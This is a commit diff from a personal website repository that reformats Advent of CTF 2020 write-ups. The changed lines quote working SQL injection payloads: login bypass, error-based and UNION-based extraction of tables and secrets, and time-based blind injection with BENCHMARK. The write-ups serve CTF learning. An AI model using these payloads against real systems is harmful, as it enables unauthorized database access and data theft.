maik
/
Personal-Website
mirror of https://github.com/maikka39/Personal-Website.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix linting and formatting issues

Browse Source
master
Maik de Kruif 2 weeks ago
parent cc261d6aaa
commit 6fa9f7b09f
No known key found for this signature in database
GPG Key ID: DB1A8C782DD43CB3
24 changed files with 154 additions and 152 deletions
Whitespace
Show all changes Ignore whitespace when comparing lines Ignore changes in amount of whitespace Ignore changes in whitespace at EOL
Unified View
Diff Options
Show Stats Download Patch File Download Diff File
  1. 4
      content/writeups/adventofctf/2020/challenge_23.md
  2. 10
      content/writeups/adventofctf/2020/challenge_5.md
  3. 8
      content/writeups/adventofctf/2020/challenge_6.md
  4. 12
      content/writeups/adventofctf/2020/challenge_7.md
  5. 2
      content/writeups/adventofctf/2020/challenge_8.md

4
content/writeups/adventofctf/2020/challenge_23.md
Unescape View File

@ -49,7 +49,9 @@ $(function () {
socket.on("chat message", function (msg) { socket.on("chat message", function (msg) {
console.log(msg.command); console.log(msg.command);
if (msg.command === "code") { if (msg.command === "code") {
$("#messages").append($("<li>").html("<pre>" + msg.message + "</pre>")); $("#messages").append(
$("<li>").html("<pre>" + msg.message + "</pre>")
);
} else { } else {
$("#messages").append($("<li>").text(msg.message)); $("#messages").append($("<li>").text(msg.message));
} }

10
content/writeups/adventofctf/2020/challenge_5.md
Unescape View File

@ -72,7 +72,7 @@ The query becomes invalid as there is an unterminated string. So, how do we turn
## Solution ## Solution
Firstly, I tried to use `' OR 1=1 -- ` as the username and, again, some garbage as the password. However, it didn't work. It didn't even return an error. So I guess this is where "A classic, with a twist." comes in. Next, I tried to just use `admin` as the username and end the query after it by inserting a comment (this is `--` in sql). The resulting input would become `admin' -- ` for the username, the password doesn't matter. Firstly, I tried to use `' OR 1=1 --` as the username and, again, some garbage as the password. However, it didn't work. It didn't even return an error. So I guess this is where "A classic, with a twist." comes in. Next, I tried to just use `admin` as the username and end the query after it by inserting a comment (this is `--` in sql). The resulting input would become `admin' --` for the username, the password doesn't matter.
The resulting query would be this: The resulting query would be this:
@ -90,7 +90,7 @@ As [@credmp](https://twitter.com/credmp) correctly pointed out, this only works
### Getting the database ### Getting the database
As we can see the error on the page itself, we can use a query to give a result inside the error. For instance, to get the database I used the following input: `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- `. This results into the following query: As we can see the error on the page itself, we can use a query to give a result inside the error. For instance, to get the database I used the following input: `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --`. This results into the following query:
```sql ```sql
FROM `users` SELECT * WHERE `username`='' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) as x FROM information_schema.tables GROUP BY x) as y) -- ' AND `password`='' FROM `users` SELECT * WHERE `username`='' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) as x FROM information_schema.tables GROUP BY x) as y) -- ' AND `password`=''
@ -167,7 +167,7 @@ We can only get the tables one by one (as I explained above) so we can use the f
SELECT table_name FROM information_schema.tables WHERE table_schema='testdb' LIMIT 0,1 SELECT table_name FROM information_schema.tables WHERE table_schema='testdb' LIMIT 0,1
``` ```
Converted to an input we get `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables WHERE table_schema='testdb' LIMIT 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ` Converted to an input we get `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables WHERE table_schema='testdb' LIMIT 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --`
_Note: to get next table, just edit the `LIMIT` to `1,1`, `2,1` and so on_ _Note: to get next table, just edit the `LIMIT` to `1,1`, `2,1` and so on_
@ -187,7 +187,7 @@ A sub-query for columns could be the following:
SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1
``` ```
Which converts to this input: `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ` Which converts to this input: `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --`
Which gives us (with other `LIMIT` as well): Which gives us (with other `LIMIT` as well):
@ -211,7 +211,7 @@ A simple `SELECT` query for the username would be:
SELECT username from users limit 0,1 SELECT username from users limit 0,1
``` ```
Turing this into an input we get `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT username from users limit 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ` Turing this into an input we get `' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT username from users limit 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --`
We get: We get:

8
content/writeups/adventofctf/2020/challenge_6.md
Unescape View File

@ -62,7 +62,7 @@ If this were the query, we could use a `UNION SELECT` to add our own query. Let'
UNION SELECT table_name, 2, 3 FROM information_schema.tables UNION SELECT table_name, 2, 3 FROM information_schema.tables
``` ```
The `2` and `3` in the `SELECT` are a filler because our guessed query has three columns. The use this query we have to escape the string in the query first. To do this, I added a `'` before our query and appended the symbols for a comment (`--`) at the end. This results in the following input: `' UNION SELECT table_name, 2, 3 FROM information_schema.tables -- `. This way the query that will be executed becomes this: The `2` and `3` in the `SELECT` are a filler because our guessed query has three columns. The use this query we have to escape the string in the query first. To do this, I added a `'` before our query and appended the symbols for a comment (`--`) at the end. This results in the following input: `' UNION SELECT table_name, 2, 3 FROM information_schema.tables --`. This way the query that will be executed becomes this:
```sql ```sql
SELECT id, descr, proof FROM santabase WHERE descr LIKE '%' UNION SELECT table_name, 2, 3 FROM information_schema.tables -- %' OR proof LIKE '%' UNION SELECT table_name, 2, 3 FROM information_schema.tables -- %' SELECT id, descr, proof FROM santabase WHERE descr LIKE '%' UNION SELECT table_name, 2, 3 FROM information_schema.tables -- %' OR proof LIKE '%' UNION SELECT table_name, 2, 3 FROM information_schema.tables -- %'
@ -254,7 +254,7 @@ The flags table at the bottom looks interesting. Let's grab it's contents. To ge
UNION SELECT (SELECT * FROM flags), 2, 3 UNION SELECT (SELECT * FROM flags), 2, 3
``` ```
This query also has to be converted to an input first. This will become `' UNION SELECT (SELECT * FROM flags), 2, 3 -- `. This query also has to be converted to an input first. This will become `' UNION SELECT (SELECT * FROM flags), 2, 3 --`.
After submitting this input, I got the flag: `NOVI{7h1s_flag_w@s_chuncky_right}`. After submitting this input, I got the flag: `NOVI{7h1s_flag_w@s_chuncky_right}`.
@ -272,7 +272,7 @@ Because the `secrets` table a more than one column, we need to know the column n
UNION SELECT column_name, 2, 3 FROM information_schema.columns WHERE table_name = "secrets" UNION SELECT column_name, 2, 3 FROM information_schema.columns WHERE table_name = "secrets"
``` ```
Converted to an input: `' UNION SELECT column_name, 2, 3 FROM information_schema.columns WHERE table_name = "secrets" -- `. Converted to an input: `' UNION SELECT column_name, 2, 3 FROM information_schema.columns WHERE table_name = "secrets" --`.
After remove the results from the original query, we get the following: After remove the results from the original query, we get the following:
@ -290,7 +290,7 @@ UNION SELECT CONCAT(id, ":", description, ":", proof), 2, 3 FROM secrets
The `CONCAT()` here is to put our results into the first column as the other two column are hidden after the first five characters. The `CONCAT()` here is to put our results into the first column as the other two column are hidden after the first five characters.
This query converts to `' UNION SELECT CONCAT(id, ":", description, ":", proof), 2, 3 FROM secrets -- ` as the input. This query converts to `' UNION SELECT CONCAT(id, ":", description, ":", proof), 2, 3 FROM secrets --` as the input.
After parsing the output we get: After parsing the output we get:

12
content/writeups/adventofctf/2020/challenge_7.md
Unescape View File

@ -44,13 +44,13 @@ This time, no error message is shown. But the output is! (I'll get back to that
SELECT why FROM naughty WHERE why LIKE '%search text%'; SELECT why FROM naughty WHERE why LIKE '%search text%';
``` ```
If this were the query, we can easily try to just get all records. To do this, we need to modify the `WHERE` statement to always be true. A way to do this is to add a `OR 1=1 -- ` to the query as `1` is always equal to `1`. But how do we do that? Well, is the backend doesn't properly create a query, we can escape the string inside the `WHERE` query and add our own code. An example input would be `' OR 1=1 -- `. If this would be inserted inside the query we would get this: If this were the query, we can easily try to just get all records. To do this, we need to modify the `WHERE` statement to always be true. A way to do this is to add a `OR 1=1 --` to the query as `1` is always equal to `1`. But how do we do that? Well, is the backend doesn't properly create a query, we can escape the string inside the `WHERE` query and add our own code. An example input would be `' OR 1=1 --`. If this would be inserted inside the query we would get this:
```sql ```sql
SELECT why FROM naughty WHERE why LIKE '%' OR 1=1 -- %'; SELECT why FROM naughty WHERE why LIKE '%' OR 1=1 -- %';
``` ```
If we input this (`' OR 1=1 -- `) in the search field, we get the flag! It is `NOVI{bl1nd_sql1_is_naughty}` If we input this (`' OR 1=1 --`) in the search field, we get the flag! It is `NOVI{bl1nd_sql1_is_naughty}`
This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#7-8). This flag can then be submitted for the [challenge](https://ctfd.adventofctf.com/challenges#7-8).
@ -102,7 +102,7 @@ Now that we know the table name, we can then get the columns from it with this q
SELECT column_name FROM information_schema.columns WHERE table_name = "naughty" SELECT column_name FROM information_schema.columns WHERE table_name = "naughty"
``` ```
If we convert this to an input, we get `' UNION SELECT column_name FROM information_schema.columns WHERE table_name = "naughty" -- `. This return the following rows: If we convert this to an input, we get `' UNION SELECT column_name FROM information_schema.columns WHERE table_name = "naughty" --`. This return the following rows:
| Who? | | Who? |
| -------- | | -------- |
@ -118,7 +118,7 @@ Knowing the table and column names, we can get all rows in the table. This outpu
SELECT CONCAT(id, " | ", username, " | ", badthing) FROM naughty SELECT CONCAT(id, " | ", username, " | ", badthing) FROM naughty
``` ```
Converted to an input we get `' UNION SELECT CONCAT(id, " | ", username, " | ", badthing) FROM naughty -- `, which, after submitting it, gives us one row: Converted to an input we get `' UNION SELECT CONCAT(id, " | ", username, " | ", badthing) FROM naughty --`, which, after submitting it, gives us one row:
| Who? | | Who? |
| ------------------------------------------- | | ------------------------------------------- |
@ -148,7 +148,7 @@ SELECT CASE WHEN (SELECT DATABASE() LIKE "a%") THEN BENCHMARK(9000000,MD5(1)) EL
This would run `BENCHMARK(9000000,MD5(1))` if the sub-query returns more than 1 row. The `BENCHMARK()` is used because it's a function that takes a while to run. This would run `BENCHMARK(9000000,MD5(1))` if the sub-query returns more than 1 row. The `BENCHMARK()` is used because it's a function that takes a while to run.
This query will have to be converted to an input first. This will become `' UNION SELECT CASE WHEN (SELECT DATABASE() LIKE "a%") THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END -- ` This query will have to be converted to an input first. This will become `' UNION SELECT CASE WHEN (SELECT DATABASE() LIKE "a%") THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END --`
If we replace `a` with another letter we can find out the database name like this: If we replace `a` with another letter we can find out the database name like this:
@ -177,6 +177,6 @@ To get the tables inside the database, the same method will have to be used. An
SELECT CASE WHEN COUNT((SELECT table_name FROM information_schema.tables WHERE table_name LIKE "a%" AND table_schema = "testdb" LIMIT 1))>0 THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END SELECT CASE WHEN COUNT((SELECT table_name FROM information_schema.tables WHERE table_name LIKE "a%" AND table_schema = "testdb" LIMIT 1))>0 THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END
``` ```
Which will convert to `' UNION SELECT CASE WHEN COUNT((SELECT table_name FROM information_schema.tables WHERE table_name LIKE "a%" AND table_schema = "testdb" LIMIT 1))>0 THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END -- ` Which will convert to `' UNION SELECT CASE WHEN COUNT((SELECT table_name FROM information_schema.tables WHERE table_name LIKE "a%" AND table_schema = "testdb" LIMIT 1))>0 THEN BENCHMARK(9000000,MD5(1)) ELSE 1 END --`
By using this method, we can get the all database records but it will take a long time. By using this method, we can get the all database records but it will take a long time.

2
content/writeups/adventofctf/2020/challenge_8.md
Unescape View File

@ -41,7 +41,7 @@ This is talking about robots, which my be a hint to look at the [`robots.txt`](h
### What is a robots.txt file? ### What is a robots.txt file?
A `robots.txt` file lives at the root of a website. So, for the site www.example.com, a robots.txt file would live at www.example.com/robots.txt. robots.txt is a plain text file that follows the [Robots Exclusion Standard](http://en.wikipedia.org/wiki/Robots_exclusion_standard#About_the_standard). A robots.txt file consists of one or more rules. Each rule blocks (or allows) access for a given crawler to a specified file path in that website. A `robots.txt` file lives at the root of a website. So, for the site www\.example\.com, a robots.txt file would live at www\.example\.com/robots.txt. robots.txt is a plain text file that follows the [Robots Exclusion Standard](http://en.wikipedia.org/wiki/Robots_exclusion_standard#About_the_standard). A robots.txt file consists of one or more rules. Each rule blocks (or allows) access for a given crawler to a specified file path in that website.
### Opening the file ### Opening the file

Write Preview
Loading…
Cancel
Save